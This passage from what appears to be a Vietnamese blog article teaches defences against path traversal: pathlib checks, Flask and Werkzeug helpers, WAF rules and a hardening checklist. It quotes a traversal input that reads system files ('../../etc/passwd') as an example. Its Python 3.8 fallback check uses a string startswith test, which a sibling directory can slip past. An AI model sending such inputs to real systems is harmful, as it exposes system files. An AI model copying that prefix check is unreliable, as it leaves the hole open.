    return send_file(f"/var/www/uploads/{FILE_MAP[file_id]}")

User chỉ thấy ID, không bao giờ chạm được path thật.

Bài học 2: Python pathlib – Cách Chuẩn Từ Bỏ os.path.join()

from pathlib import Path

BASE_DIR = Path('/var/www/uploads').resolve()  # Chuẩn hoá base
user_input = request.args.get('filename')
requested = (BASE_DIR / user_input).resolve()  # Resolve loại bỏ ../

# Kiểm tra CRITICAL:
if not requested.is_relative_to(BASE_DIR):  # Python 3.9+
    abort(400, "Path traversal detected")

# Hoặc Python 3.8-:
if not str(requested).startswith(str(BASE_DIR)):
    abort(400)

return send_file(requested)

Tại sao an toàn:

.resolve() chuẩn hoá đường dẫn, bỏ ../, expand symlink
is_relative_to() đảm bảo file nằm trong base
Không bị "nuốt base" như os.path.join()

Bài học 3: Framework Primitives – Đừng Tự Làm Cái Đã Có Sẵn

Flask:

from flask import send_from_directory
return send_from_directory('/var/www/uploads', filename)
# ✅ Tự động validate, chặn traversal

FastAPI:

from fastapi.staticfiles import StaticFiles
app.mount("/static", StaticFiles(directory="static"), name="static")
# ✅ Built-in protection

Django:

from django.http import FileResponse
return FileResponse(open(safe_path, 'rb'))
# ✅ Dùng với path đã validate

Werkzeug (Flask dependency):

from werkzeug.utils import secure_filename
filename = secure_filename(user_input)
# ../../etc/passwd → etc_passwd

CHECKLIST "MANG VỀ ÁP DỤNG NGAY"

[ ] Audit code: Grep toàn bộ codebase tìm open(, os.path.join(, send_file(, tar.extractall(, FileProvider, ContentProvider.openFile(). Đánh dấu chỗ nào user input chạm vào path.
[ ] Cài SAST vào CI/CD: Bandit (Python), Semgrep (multi-language) – block merge nếu detect unsafe file operation.
[ ] Bật WAF rules: ModSecurity CRS 930100–930130 (path traversal), hoặc AWS WAF/Cloudflare managed ruleset.
[ ] Framework update: Patch ngay CVE mới (Spring, Django, Flask, Node.js)—check security advisory hàng tuần.
[ ] Principle of least privilege: App chạy với user www-data, không phải root; chmod 640 cho sensitive files, 750 cho upload dir.
[ ] Container/SELinux/AppArmor: Giới hạn filesystem access—app chỉ đọc được /var/www/, deny /etc/, /root/, /home/.
[ ] Logging & monitoring: Log mọi validation failure với user ID + attempted path → detect attack pattern → alert SOC.
[ ] Mobile: Google Play scan: Đảm bảo ContentProvider có android:exported="false" trừ khi cần thiết; FileProvider dùng <files-path path="subdir/"> thay vì path=".".

KẾT: ĐÔI CHỮ "../" VÀ BÀI HỌC VỀ KHI THƯỜNG

Path traversal tồn tại 20+ năm, tăng 85% trong 2 năm qua, gây thiệt hại hàng trăm triệu USD và 106 triệu người bị lộ thông tin—nhưng vẫn có đồng nghiệp gọi nó là "lỗi cơ bản". Sự thật là: không có lỗi "cơ bản" nào cả, chỉ có hệ quả nghiêm trọng được đánh giá thấp.

Tuần này, hãy chạy Bandit scan, bật WAF rule 930100, và refactor đoạn code os.path.join() đáng ngờ kia. Hãy review ContentProvider trong app Android. Hãy kiểm tra xem server có chạy với root privileges không. Vì đêm nào cũng có ransomware gang scan FortiOS VPN, vì CISA vẫn phải ra alert cho WinRAR năm 2025, vì Capital One vẫn chưa trả hết tiền bồi thường.

Và nhớ: cứ mỗi lần bạn thấy ../ trong log, hãy cảm ơn monitoring system—vì nếu không có nó, dòng đó có thể đang chạy trong /etc/cron.d/.

Joke đen tối #3: Nếu path traversal là "lỗi cơ bản", thì tại sao năm nào cũng có CVE mới? Có lẽ định nghĩa "cơ bản" của chúng ta cần... traverse lại từ đầu.

TÀI LIỆU THAM KHẢO

MITRE CWE-22: Improper Limitation of a Pathname to a Restricted Directory
OWASP Path Traversal (2024 update)
CVE-2023-50164 (Apache Struts), CVE-2024-38816 (Spring Framework), CVE-2025-8088 (WinRAR), CVE-2007-4559 (Python tarfile)
CISA Known Exploited Vulnerabilities Catalog
Oversecured Mobile Security Research (Android ContentProvider analysis)
Python PEP 706: Filter for tarfile.extractall
OWASP ModSecurity Core Rule Set v4.x

TL;DR

MỞ BÁT – KHI "LỖI CƠ BẢN" TRỞ THÀNH ÁC MỘNG TỈ ĐÔ

1. Path Traversal Hiện Đại: Vượt Xa ../ – Chào Mừng Đến Mê Cung Encoding

A. URL Encoding – Lớp Ngụy Trang Đầu Tiên

B. Double URL Encoding – Khi Web Server Decode 2 Lần

C. Unicode 16-bit & Overlong UTF-8 – Trò Mã Hóa Phỉ báng

D. Null Byte Injection – Khi C String Terminator Làm Loạn mọi thứ

E. Windows-Specific Bypasses – Đặc Sản Hệ Điều Hành

F. Kết Luận: Đa Tầng Bypass Trong Thực Chiến

2. CVE 2023–2025: Khi "Hello world của Hacking" Có Điểm CVSS 9.8

Deep Dive: CVE-2025-8088 WinRAR – Zero-Day Được Bán $80,000 Trên Dark Web

3. Mobile & Backend: ContentProvider, os.path.join(), Và 350,000 Dự Án Khóc Thầm

4. Breach Thực Tế: $100 Triệu, 106 Triệu Người, Và 6 Năm ác mộng

BA BÀI HỌC BẢO MẬT ÁP DỤNG NGAY

Bài học 1: Dùng Indirect Reference – Đừng Bao Giờ Tin User Input Cho File Path

Bài học 2: Python pathlib – Cách Chuẩn Từ Bỏ os.path.join()

Bài học 3: Framework Primitives – Đừng Tự Làm Cái Đã Có Sẵn

CHECKLIST "MANG VỀ ÁP DỤNG NGAY"

KẾT: ĐÔI CHỮ "../" VÀ BÀI HỌC VỀ KHI THƯỜNG

TÀI LIỆU THAM KHẢO

1. Path Traversal Hiện Đại: Vượt Xa `../` – Chào Mừng Đến Mê Cung Encoding